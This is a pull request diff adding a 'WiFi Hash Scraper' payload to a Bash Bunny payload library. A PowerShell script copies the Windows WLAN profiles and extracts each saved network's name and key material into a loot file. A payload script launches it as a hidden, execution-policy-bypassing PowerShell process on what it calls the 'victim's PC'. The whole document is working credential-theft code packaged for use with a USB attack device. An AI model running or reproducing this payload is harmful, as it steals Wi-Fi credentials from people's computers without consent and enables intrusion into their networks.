Merge pull request #577 from KryptoKola/patch-2

WiFi Hash Scraper

payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1

@@ -0,0 +1,22 @@
+#Wi-Fi Information Scraper
+cd "~";
+$tDate = Get-Date -Format "MM-dd-yyyy";
+$vol = Get-Volume -FileSystemLabel BashBunny;
+$baseDir = $vol.DriveLetter + ":/loot/WiFi-Hash-Scraper/" + $tDate;
+$interfaceDir = $baseDir + "/Interfaces";
+$oFile = $baseDir + "/WiFi-Info.txt";
+Copy-Item "C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces" "$interfaceDir" -R -Force;
+cd $interfaceDir;
+$temp = Get-ChildItem | Select-String "{";
+$interfaces = $temp -split "[Environment]::NewLine";
+foreach($iface in $interfaces){
+    cd $iface;
+    $ftemp = Get-ChildItem;
+    $files = $ftemp -split "[Environment]::NewLine";
+    foreach($sNet in $files){
+        $temp = cat "$sNet" | Select-String "name";$temp += "";$temp += cat $sNet | Select-String "keyMaterial";echo $temp | Out-File $oFile -Append
+    }
+    cd ../;
+}
+cd "~";
+Remove-Item $interfaceDir -R;

payloads/library/recon/WiFi-Hash-Scraper/payload.txt

@@ -0,0 +1,23 @@
+#!/bin/bash
+#
+# Title:            Wi-Fi Hash Scraper
+#
+# Description:      
+# 			  Copies all of the known / saved WiFi password hashes from the victim's PC to the BashBunny's loot folder.
+#
+# Author:           KryptoKola
+# Version:          1.0
+# Category:         Recon
+# Target:           Microsoft Windows 10 & 11
+
+ATTACKMODE HID STORAGE
+GET BB_LABEL
+
+LED SETUP
+GET SWITCH_POSITION
+LED ATTACK
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel '${BB_LABEL}').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
+Q DELAY 250
+Q ENTER
+Q DELAY 3000
+LED FINISH